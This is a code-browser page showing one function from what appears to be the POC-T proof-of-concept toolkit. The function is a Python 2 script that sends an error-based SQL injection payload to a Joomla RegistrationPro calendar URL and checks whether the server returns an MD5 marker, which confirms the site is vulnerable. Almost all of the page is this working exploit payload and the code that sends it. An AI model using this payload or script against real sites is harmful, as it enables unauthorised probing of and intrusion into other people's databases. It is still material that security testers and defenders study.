hub / github.com/Xyntax/POC-T / poc

Function poc

script/joomla-registrationpro-sqli.py:23–38
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
    return False

Callers

nothing calls this directly

Calls 4

iterate_path · Function · 0.90
randomMD5 · Function · 0.90
format · Method · 0.80
get · Method · 0.80

Tested by

no test coverage detected